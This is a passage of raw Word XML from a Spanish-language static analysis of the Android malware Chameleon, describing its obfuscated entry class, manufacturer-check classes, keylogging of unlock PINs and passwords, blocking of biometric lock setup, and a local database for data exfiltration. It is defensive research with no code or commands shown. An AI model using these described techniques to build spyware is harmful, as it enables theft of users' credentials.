          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007633F5">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>haciendo uso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A5D4F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>esta vez d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el nuevo archivo DEX encontrado. Obtenemos </w:t>
      </w:r>
      <w:r w:rsidR="007B2047">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de nuevo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> código </w:t>
      </w:r>
      <w:r w:rsidR="00D03141">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ofuscado, pero en este caso más legible que en la primera iteración. Además, encontramos la clase de tipo Activity marcada como punto de entrada de la aplicación en “</w:t>
      </w:r>
      <w:r w:rsidRPr="007958A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>AndroidManifest.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”, que tiene el nombre “</w:t>
      </w:r>
      <w:r w:rsidRPr="007958A5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Xk7d4258c1c9c337733fb3a8c3aaf570e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5900F5" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00050E15">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por lo tanto, hasta el momento nos encontraríamos con la siguiente estructura que sugiere el código en lo referente a la carga de clases de manera dinámica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86951D" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="000C1FC5" w:rsidP="00337CE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="28A9B80B">
          <v:shape id="_x0000_s2064" type="#_x0000_t75" alt="A black background with white squares&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:26.55pt;width:178.55pt;height:280.3pt;z-index:2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48" o:title="A black background with white squares&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="481358C5" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2941523D" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00337CE1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FCAB60" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Como se ha mencionado, las nuevas clases obtenidas también se encuentran ofuscadas, pero su legibilidad es mayor y al contar con el punto de entrada de la aplicación, se puede tratar de realizar una deofuscación manual mediante las funciones que posee JADX para el renombrado de clases y métodos, además de su sistema de comentarios de código con el que dejar referencias para futura investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDFD346" w14:textId="670468E1" w:rsidR="00F10E86" w:rsidRDefault="00F10E86" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">En la siguiente parte del análisis estático, se irán mostrando las clases diseccionadas durante el proceso. No se incluyen todas las clases </w:t>
      </w:r>
      <w:r w:rsidR="00436CBB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">pertenecientes a la aplicación, ya que algunas de ellas no </w:t>
      </w:r>
      <w:r w:rsidR="00B0136C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">son pertinentes, y en el caso de otras no se ha podido </w:t>
      </w:r>
      <w:r w:rsidR="0043347F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>confirmar que lleven a cabo alguna</w:t>
      </w:r>
      <w:r w:rsidR="00B0136C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> función dentro de los mecanismos que exhibe el malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD7F73" w14:textId="457F40FC" w:rsidR="002E176C" w:rsidRDefault="00B0136C" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las clases presentadas han sido renombradas respecto a sus versiones ofuscadas para mejorar la legibilidad y hacer el sistema más fácil de comprender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB642CA" w14:textId="24414BF8" w:rsidR="005F2A3A" w:rsidRDefault="00B0136C" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En primer lugar, se tratarán las clases descubiertas relativas al punto de entrada de la aplicación y el mecanismo que utiliza para la obtención de los permisos necesarios, así como las funciones de la API de administración y de accesibilidad comentadas en capítulos anteriores.</w:t>
      </w:r>
      <w:r w:rsidR="005F2A3A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Las principales clases involucradas en los procesos mencionados se encuentran en el siguiente diagrama UML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DEF584" w14:textId="4B626FA3" w:rsidR="008B4C89" w:rsidRDefault="000C1FC5" w:rsidP="008B4C89">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:pict w14:anchorId="03300C93">
          <v:shape id="Picture 30" o:spid="_x0000_i1030" type="#_x0000_t75" alt="A screenshot of a computer screen&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="width:441pt;height:402pt;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId49" o:title="A screenshot of a computer screen&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B71CF" w14:textId="77777777" w:rsidR="00EC3F29" w:rsidRDefault="00EC3F29" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236FFCCD" w14:textId="5701B28B" w:rsidR="00BC737A" w:rsidRDefault="00BC737A" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Durante el proceso de intento de obtención de permisos</w:t>
      </w:r>
      <w:r w:rsidR="00A21706">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> también </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se realizan varias comprobaciones sobre el dispositivo infectado, alterando los mecanismos utilizados en función tanto de la versión de Android encontrada como de los resultados de las verificaciones de fabricante. Para realizar estas validaciones de marca, Chameleon hace uso de las siguientes clases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FBD8F9" w14:textId="6C34BBCD"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DeviceActionManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF6A7C8" w14:textId="036AE006"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AsusChecker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC5A04E" w14:textId="2FBC2DC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HtcChecker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F419E8" w14:textId="2774104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HuaweiChecker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0604615F" w14:textId="6874092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LetvChecker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F4A07F" w14:textId="47CDD31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MeizuChecker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC095CE" w14:textId="2B7772B5"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MeizuSecurityVersionEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4321CBF4" w14:textId="3FCCACAC"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OnePlusChecker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A4E3F1" w14:textId="4637A6B7"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SamsungChecker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DCDC4E" w14:textId="0563A7A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XiaomiChecker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA8245" w14:textId="4120C318"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ZteCheker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31923ACB" w14:textId="3C890DD3" w:rsidR="00BC737A" w:rsidRPr="001228FB" w:rsidRDefault="00BC737A" w:rsidP="00BC737A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001228FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DeviceManufacturersEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D935D35" w14:textId="1A0CCF3F" w:rsidR="00BC737A" w:rsidRDefault="00BC737A" w:rsidP="00BC737A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001228FB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DeviceBuildDetailsFinder</w:t>
      </w:r>
      <w:r w:rsidR="00982B66">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB12741" w14:textId="416A5BD6" w:rsidR="00A97FA9" w:rsidRDefault="00A97FA9" w:rsidP="00B236A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El malware trata de almacenar información variada, incluyendo el método de desbloqueo del dispositivo en el caso de que este sea el método elegido por el usuario</w:t>
      </w:r>
      <w:r w:rsidR="00B236A1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Además, introduce la función de keylogger. Este mecanismo es utilizado en este caso para registrar la contraseña o el PIN de desbloqueo elegido por el usuario, pero también se utilizará en otras funciones de recogida de datos de tipología infostealer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0CB78A" w14:textId="77777777" w:rsidR="00B236A1" w:rsidRDefault="00B236A1" w:rsidP="00B236A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F328FE" w14:textId="609680F4" w:rsidR="00B236A1" w:rsidRDefault="000C1FC5" w:rsidP="00B236A1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4B4D5EB0">
          <v:shape id="Picture 20" o:spid="_x0000_i1029" type="#_x0000_t75" alt="A screenshot of a computer screen&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="width:466pt;height:424pt;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId50" o:title="A screenshot of a computer screen&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="302FA736" w14:textId="77777777" w:rsidR="008D3358" w:rsidRDefault="008D3358" w:rsidP="008D3358">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691C7A51" w14:textId="00D40E08" w:rsidR="008C405B" w:rsidRDefault="008C405B" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Otra de las funciones relacionadas con los métodos de bloqueo es la relativa a la clase BiometricInterruptionManager mostrada previamente. Esta clase tiene como función aparente la prevención del cambio por parte del usuario a un bloqueo de dispositivo biométrico.</w:t>
      </w:r>
      <w:r w:rsidR="004F2B74">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Estos tipos de autenticación son aquellos que utilizan características biológicas únicas de los usuarios, como puede ser su huella dactilar, su rostro o el iris. Pese a ser considerados por Android como un escalón inferior de seguridad respecto a factores de autenticación como la contraseña, sus datos no pueden ser captados por parte del malware como es el caso del PIN o la contraseña, ya que los dispositivos y sistemas Android deben almacenar la información biométrica en el Trusted Execution Environment</w:t>
      </w:r>
      <w:r w:rsidR="00CB326B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o TEE</w:t>
      </w:r>
      <w:r w:rsidR="004F2B74">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r w:rsidR="00651580">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que garantiza también que la gestión de estos datos solo se puede llevar a cabo por una CPU especializada que se está ejecutando en modo seguro. Esto también elimina la posibilidad de acceder a </w:t>
      </w:r>
      <w:r w:rsidR="00651580">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>los datos aún con modo superusuario por parte del sistema.</w:t>
      </w:r>
      <w:r w:rsidR="00B772BC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> No obstante, algunos de los detalles de la implementación de la gestión biométrica varían según el fabricante, y se han encontrado fallos de seguridad para algunos como OnePlus [X]. </w:t>
      </w:r>
      <w:r w:rsidR="008E52DD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sin embargo, Chameleon no realiza operaciones sofisticadas para tratar de obtener los datos biométricos, sino que simplemente parece que trata de evitar que el usuario modifique el bloqueo del dispositivo a un método biométrico. Las comprobaciones del malware y las acciones que lleva a cabo que han sido identificadas a partir del código ofuscado se resumen en el siguiente diagrama:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AB0712" w14:textId="77777777" w:rsidR="008E52DD" w:rsidRDefault="008E52DD" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FD8F77" w14:textId="56D3AC05" w:rsidR="008E52DD" w:rsidRDefault="000C1FC5" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="026A1536">
          <v:shape id="_x0000_s2063" type="#_x0000_t75" alt="A screenshot of a phone&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:5.95pt;width:388.5pt;height:547.2pt;z-index:28;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1" o:title="A screenshot of a phone&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59518399" w14:textId="13744928" w:rsidR="00543008" w:rsidRDefault="00543008" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Como se puede ver, el malware tolera los sistemas de bloqueo mediante PIN, patrón o contraseña ya que posee la funcionalidad para registrar sus valores y posteriormente desbloquear el dispositivo de manera autónoma. </w:t>
      </w:r>
      <w:r w:rsidR="00326878">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Por el contrario, si el tipo de evento de bloqueo no es uno de los anteriores, solamente queda la opción de tipo biométrico, y Chameleon </w:t>
      </w:r>
      <w:r w:rsidR="00326878">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">utiliza las acciones de botones para salir del menú </w:t>
      </w:r>
      <w:r w:rsidR="00EB3D92">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de ajuste </w:t>
      </w:r>
      <w:r w:rsidR="00326878">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y evitar que el usuario pueda registrar el método.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0DEEE" w14:textId="77777777" w:rsidR="008C405B" w:rsidRDefault="008C405B" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448F41D9" w14:textId="048D6ED0" w:rsidR="00866C85" w:rsidRDefault="00295845" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A continuación, se lleva a cabo una revisión de las clases encontradas relativas a la gestión de la base de datos creada por el malware y utilizada para almacenar datos generados por el dispositivo infectado con la intención de su posterior exfiltración a los servidores C&amp;</w:t>
      </w:r>
      <w:r w:rsidR="00866C85">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">C. El diagrama de clases involucradas en estas tareas es el siguiente: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053E7F8" w14:textId="289DEE5A" w:rsidR="00866C85" w:rsidRDefault="00866C85" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000C1FC5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:pict w14:anchorId="528B455F">
          <v:shape id="Picture 19" o:spid="_x0000_i1028" type="#_x0000_t75" alt="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="width:410pt;height:440pt;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0">
            <v:imagedata r:id="rId52" o:title="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EF3A20" w14:textId="77777777" w:rsidR="00295845" w:rsidRDefault="00295845" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A0C0F0" w14:textId="639D78CD" w:rsidR="00C74131" w:rsidRDefault="00C74131" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El nombre dado a la base de datos por parte del malware es un identificador único en formato UUID</w:t>
      </w:r>
      <w:r w:rsidR="00620974">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta combinación se utiliza en más operaciones como contactos a la API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>de los servidores C&amp;C. Debido a sus características se puede considerar como un identificador del dispositivo infectado, ya que se genera</w:t>
      </w:r>
      <w:r w:rsidR="00C96DFC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en función de los datos del dispositivo además de una clave constante con valor “35”.</w:t>
      </w:r>
      <w:r w:rsidR="00104A2D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> El proceso utilizado se muestra en el diagrama a continuación con el ejemplo de uno de los identificadores generados para uno de los dispositivos emulados que han instalado el malware durante la fase de análisis dinámico:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59493875" w14:textId="18DAF56B" w:rsidR="00104A2D" w:rsidRDefault="00104A2D" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6726E4" w14:textId="484A66D7" w:rsidR="00104A2D" w:rsidRDefault="000C1FC5" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="34151E2C">
          <v:shape id="Picture 4" o:spid="_x0000_s2062" type="#_x0000_t75" alt="A computer diagram with white squares&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:-46.45pt;margin-top:36.85pt;width:536.15pt;height:392.95pt;z-index:2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3" o:title="A computer diagram with white squares&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293D435" w14:textId="77777777" w:rsidR="007D2D92" w:rsidRDefault="00BC590A" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En esta base de datos creada se almacena información de todo tipo como parte de la función infostealer de Chameleon. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE36DA" w14:textId="4E13E2F7" w:rsidR="007D2D92" w:rsidRDefault="002A7752" w:rsidP="00235AB4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La lista</w:t>
      </w:r>
      <w:r w:rsidR="007D2D92">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de tablas inicial generad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
